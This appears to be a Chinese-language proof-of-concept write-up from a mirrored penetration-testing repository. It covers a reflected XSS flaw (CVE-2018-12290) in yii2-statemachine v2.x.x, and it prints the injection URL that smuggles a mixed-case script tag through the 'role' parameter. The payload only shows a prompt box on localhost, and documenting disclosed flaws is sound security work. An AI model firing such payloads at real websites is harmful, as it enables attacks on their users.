admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-07-09 16:05:40 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/yii2-statemachine v2.x.x存在XSS漏洞.md
mr-xn 0e7ad92246 update
2019-07-24 19:29:08 +08:00

20 lines
1015 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

### 漏洞简介
|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
--------|--------|---------|--------|-------|----|------|
|yii2-statemachine v2.x.x存在XSS漏洞|2018-06-12|longer|[https://github.com/ptheofan/yii2-statemachine-demo](https://github.com/ptheofan/yii2-statemachine-demo) | [https://github.com/ptheofan/yii2-statemachine-demo](https://github.com/ptheofan/yii2-statemachine-demo) |v2.x.x| [CVE-2018-12290](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12290)|
#### 漏洞概述
> 由于role参数过滤不严格导致可以插入js代码造成跨站脚本攻击。如将role参数赋值为`guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>`并进行get方式提交可造成跨站脚本攻击。
### POC实现代码如下
> exp代码如下
``` html
https://127.0.0.1/?role=guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>
```
### POC截图效果如下
![POC运行截图](img/4.png)
Reference in New Issue View Git Blame Copy Permalink